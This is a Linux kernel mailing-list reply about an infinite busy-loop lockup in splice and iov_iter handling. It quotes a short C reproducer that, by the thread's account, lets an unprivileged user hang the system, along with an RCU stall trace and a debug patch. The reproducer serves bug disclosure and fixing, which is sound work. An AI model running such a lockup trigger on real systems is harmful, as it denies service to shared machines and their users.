Re: splice: infinite busy loop lockup bug

From: Qian Cai
Date: Mon Aug 31 2020 - 20:51:45 EST


On Fri, Aug 07, 2020 at 09:34:08PM +0900, Tetsuo Handa wrote:
> On 2020/08/07 21:27, Al Viro wrote:
> > On Fri, Aug 07, 2020 at 07:35:08PM +0900, Tetsuo Handa wrote:
> >> syzbot is reporting hung task at pipe_release() [1], for for_each_bvec() from
> >> iterate_bvec() from iterate_all_kinds() from iov_iter_alignment() from
> >> ext4_unaligned_io() from ext4_dio_write_iter() from ext4_file_write_iter() from
> >> call_write_iter() from do_iter_readv_writev() from do_iter_write() from
> >> vfs_iter_write() from iter_file_splice_write() falls into infinite busy loop
> >> with pipe->mutex held.
> >>
> >> The reason of falling into infinite busy loop is that iter_file_splice_write()
> >> for some reason generates "struct bio_vec" entry with .bv_len=0 and .bv_offset=0
> >> while for_each_bvec() cannot handle .bv_len == 0.
> >
> > broken in 1bdc76aea115 "iov_iter: use bvec iterator to implement iterate_bvec()",
> > unless I'm misreading it...

I have been chasing something similar for a while as in,

https://lore.kernel.org/linux-fsdevel/89F418A9-EB20-48CB-9AE0-52C700E6BB74@xxxxxx/

In my case, it seems the endless loop happens in iterate_iovec() instead where
I put a debug patch here,

--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -33,6 +33,7 @@
if (unlikely(!__v.iov_len)) \
continue; \
__v.iov_base = __p->iov_base; \
+ printk_ratelimited("ITER_IOVEC left = %zu, n = %zu\n", left, n); \
left = (STEP); \
__v.iov_len -= left; \
skip = __v.iov_len; \

and end up seeing overflows ("n" supposes to be less than PAGE_SIZE) before the
soft-lockups and a dead system,

[ 4300.249180][T470195] ITER_IOVEC left = 0, n = 48566423

Thoughts?

> >
> > Zero-length segments are not disallowed; it's not all that hard to filter them
> > out in iter_file_splice_write(), but the intent had always been to have
> > iterate_all_kinds() et.al. able to cope with those.
> >
> > How are these pipe_buffers with ->len == 0 generated in that reproducer, BTW?
> > There might be something else fishy going on...
> >
>
> OK. Indeed writing to empty pipe which returns -EFAULT allows an empty
> page to be linked to pipe's array.
>
> Now, I've just found a simple reproducer, and confirmed that this bug is
> a local lockup DoS by unprivileged user. Please fix.
>
> ----------
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <fcntl.h>
> #include <unistd.h>
>
> int main(int argc, char *argv[])
> {
> static char buffer[4096];
> const int fd = open("/tmp/testfile", O_WRONLY | O_CREAT, 0600);
> int pipe_fd[2] = { EOF, EOF };
> pipe(pipe_fd);
> write(pipe_fd[1], NULL, 4096);
> write(pipe_fd[1], buffer, 4096);
> splice(pipe_fd[0], NULL, fd, NULL, 65536, 0);
> return 0;
> }
> ----------
>
> [ 125.598898][ C0] rcu: INFO: rcu_sched self-detected stall on CPU
> [ 125.601072][ C0] rcu: 0-....: (20171 ticks this GP) idle=526/1/0x4000000000000000 softirq=7918/7918 fqs=5136
> [ 125.604874][ C0] (t=21006 jiffies g=9341 q=30)
> [ 125.606512][ C0] NMI backtrace for cpu 0
> [ 125.607931][ C0] CPU: 0 PID: 2792 Comm: a.out Not tainted 5.8.0+ #793
> [ 125.610948][ C0] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 02/27/2020
> [ 125.614938][ C0] Call Trace:
> [ 125.616049][ C0] <IRQ>
> [ 125.617010][ C0] dump_stack+0x5e/0x7a
> [ 125.618370][ C0] nmi_cpu_backtrace.cold.7+0x14/0x52
> [ 125.620148][ C0] ? lapic_can_unplug_cpu.cold.39+0x3a/0x3a
> [ 125.622074][ C0] nmi_trigger_cpumask_backtrace+0x92/0x9f
> [ 125.624154][ C0] arch_trigger_cpumask_backtrace+0x14/0x20
> [ 125.626102][ C0] rcu_dump_cpu_stacks+0xa0/0xd0
> [ 125.627919][ C0] rcu_sched_clock_irq.cold.95+0x121/0x39c
> [ 125.629833][ C0] ? acct_account_cputime+0x17/0x20
> [ 125.631534][ C0] ? account_system_index_time+0x8a/0xa0
> [ 125.633422][ C0] update_process_times+0x23/0x60
> [ 125.635070][ C0] tick_sched_handle.isra.22+0x20/0x60
> [ 125.636870][ C0] tick_sched_timer+0x68/0x80
> [ 125.638403][ C0] ? tick_sched_handle.isra.22+0x60/0x60
> [ 125.640588][ C0] __hrtimer_run_queues+0xf9/0x1a0
> [ 125.642591][ C0] hrtimer_interrupt+0xfc/0x210
> [ 125.645033][ C0] __sysvec_apic_timer_interrupt+0x4c/0x60
> [ 125.647292][ C0] asm_call_on_stack+0xf/0x20
> [ 125.649192][ C0] </IRQ>
> [ 125.650501][ C0] sysvec_apic_timer_interrupt+0x75/0x80
> [ 125.652900][ C0] asm_sysvec_apic_timer_interrupt+0x12/0x20
> [ 125.655487][ C0] RIP: 0010:iov_iter_copy_from_user_atomic+0x19b/0x350
> [ 125.658124][ C0] Code: 89 45 d0 48 c1 e6 06 48 03 37 4d 8d 3c 09 4c 89 cf e8 d9 e5 ff ff 48 8b 45 d0 45 39 eb 0f 87 35 01 00 00 49 8b 4a 18 4d 89 f9 <45> 29 dd 45 01 d8 75 12 eb 19 41 83 c4 01 41 29 c0 74 10 44 89 e0
> [ 125.666132][ C0] RSP: 0018:ffffa6cdc1237aa8 EFLAGS: 00000246
> [ 125.668557][ C0] RAX: 0000000000000000 RBX: 0000000000001000 RCX: ffff945035a25100
> [ 125.671576][ C0] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff945035a25100
> [ 125.674851][ C0] RBP: ffffa6cdc1237ad8 R08: 0000000000000000 R09: ffff945028a80000
> [ 125.677989][ C0] R10: ffffa6cdc1237de0 R11: 0000000000000000 R12: 0000000000000000
> [ 125.680990][ C0] R13: 0000000000001000 R14: 0000000000001000 R15: 0000000000001000
> [ 125.684006][ C0] iomap_write_actor+0xbe/0x190
> [ 125.685982][ C0] ? iomap_write_begin+0x460/0x460
> [ 125.688031][ C0] iomap_apply+0xf4/0x1a0
> [ 125.689810][ C0] ? iomap_write_begin+0x460/0x460
> [ 125.691826][ C0] iomap_file_buffered_write+0x69/0x90
> [ 125.698598][ C0] ? iomap_write_begin+0x460/0x460
> [ 125.705341][ C0] xfs_file_buffered_aio_write+0xc2/0x2c0
> [ 125.707780][ C0] xfs_file_write_iter+0xa3/0xc0
> [ 125.709802][ C0] do_iter_readv_writev+0x15b/0x1c0
> [ 125.712496][ C0] do_iter_write+0x81/0x190
> [ 125.715245][ C0] vfs_iter_write+0x14/0x20
> [ 125.717221][ C0] iter_file_splice_write+0x288/0x3e0
> [ 125.719340][ C0] do_splice_from+0x1a/0x40
> [ 125.721175][ C0] do_splice+0x2e5/0x620
> [ 125.722950][ C0] __x64_sys_splice+0x97/0x100
> [ 125.724937][ C0] do_syscall_64+0x31/0x40
> [ 125.726766][ C0] entry_SYSCALL_64_after_hwframe+0x44/0xa9
> [ 125.729388][ C0] RIP: 0033:0x7f7515dd91c3
> [ 125.731246][ C0] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 66 90 83 3d fd dd 2c 00 00 75 13 49 89 ca b8 13 01 00 00 0f 05 <48> 3d 01 f0 ff ff 73 34 c3 48 83 ec 08 e8 2b d4 00 00 48 89 04 24
> [ 125.749632][ C0] RSP: 002b:00007ffd553cde18 EFLAGS: 00000246 ORIG_RAX: 0000000000000113
> [ 125.753713][ C0] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f7515dd91c3
> [ 125.756867][ C0] RDX: 0000000000000003 RSI: 0000000000000000 RDI: 0000000000000004
> [ 125.759872][ C0] RBP: 0000000000000000 R08: 0000000000010000 R09: 0000000000000000
> [ 125.763023][ C0] R10: 0000000000000000 R11: 0000000000000246 R12: 00000000004005a6
> [ 125.766225][ C0] R13: 00007ffd553cdf10 R14: 0000000000000000 R15: 0000000000000000
>